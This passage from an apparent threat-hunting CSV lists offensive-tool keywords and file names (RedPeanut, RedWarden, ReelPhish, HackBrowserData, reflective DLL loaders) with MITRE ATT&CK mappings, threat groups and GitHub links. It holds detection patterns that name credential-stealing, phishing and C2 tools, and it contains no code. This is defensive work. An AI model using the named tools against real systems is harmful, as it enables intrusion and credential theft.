TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanutShooter.*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - 
TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanutSpawn.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanutSpawnTikiTorch.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedPeanutVBAMacro.vba*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*RedSiege/CIMplant*","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","1","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" +"*redskal/SharpAzbelt*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. 
It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","1","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" +"*redsocks-fw.sh stop*","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","9","3","250","24","2022-09-29T07:41:16Z","2022-03-23T12:27:07Z" +"*Red-Team-Infrastructure-Wiki.*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" 
+"*Red-Teaming-Toolkit*","offensive_tool_keyword","Red-Teaming-Toolkit","A collection of open source and commercial tools that aid in red team operations. This repository will help you during red team engagement. If you want to contribute to this list send me a pull request","T1210 - T1211 - T1212 - T1547","TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/infosecn1nja/Red-Teaming-Toolkit","1","1","N/A","N/A","10","7962","2070","2023-06-01T08:38:39Z","2018-04-26T13:35:09Z" +"*RedTeamOperations*","offensive_tool_keyword","Github Username","Red team exploitation tools ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/RedTeamOperations","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*RedWarden.py*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*RedWarden.test*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*redwarden_access.log*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*redwarden_redirector.log*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*ReelPhish*","offensive_tool_keyword","ReelPhish","ReelPhish consists of two components: the phishing site handling code and this script. The phishing site can be designed as desired. Sample PHP code is provided in /examplesitecode. The sample code will take a username and password from a HTTP POST request and transmit it to the phishing script. The phishing script listens on a local port and awaits a packet of credentials. Once credentials are received. the phishing script will open a new web browser instance and navigate to the desired URL (the actual site where you will be entering a users credentials). 
Credentials will be submitted by the web browser","T1566 - T1114 - T1071 - T1547 - T1546","TA0001 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/fireeye/ReelPhish","1","0","N/A","N/A","5","493","156","2023-08-11T01:40:07Z","2018-02-01T20:35:11Z" +"*reflct_dll_inject.exe*","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","10","7","644","119","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z" +"*reflective_assembly_minified.ps1*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10",,"N/A",,, +"*reflective_dll.dll*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*reflective_dll.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*reflective_dll.x64.dll*","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","1","N/A","10","10","148","21","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z" +"*reflective_dll.x64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*reflective_dll_inject*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*reflective_pe_loader.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ReflectiveDll.*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" +"*ReflectiveDll.x64.dll*","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - 
T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","10","10","101","24","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z" +"*ReflectiveDll.x86.dll*","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","10","10","101","24","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z" +"*ReflectiveDLLInjection*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ReflectiveDLLInjection.*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" +"*ReflectiveDLLInjection.*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*ReflectiveDLLInjection.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ReflectiveDllInjection.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*Reflective-HackBrowserData*","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","1","N/A","10","10","148","21","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z" +"*Reflective-HackBrowserData*","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 
- T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","10","8730","1373","2023-10-02T14:38:41Z","2020-06-18T03:24:31Z" +"*ReflectiveLoader.*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" +"*ReflectiveLoader.c*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ReflectiveLoader.c*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*ReflectiveLoader.cpp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - 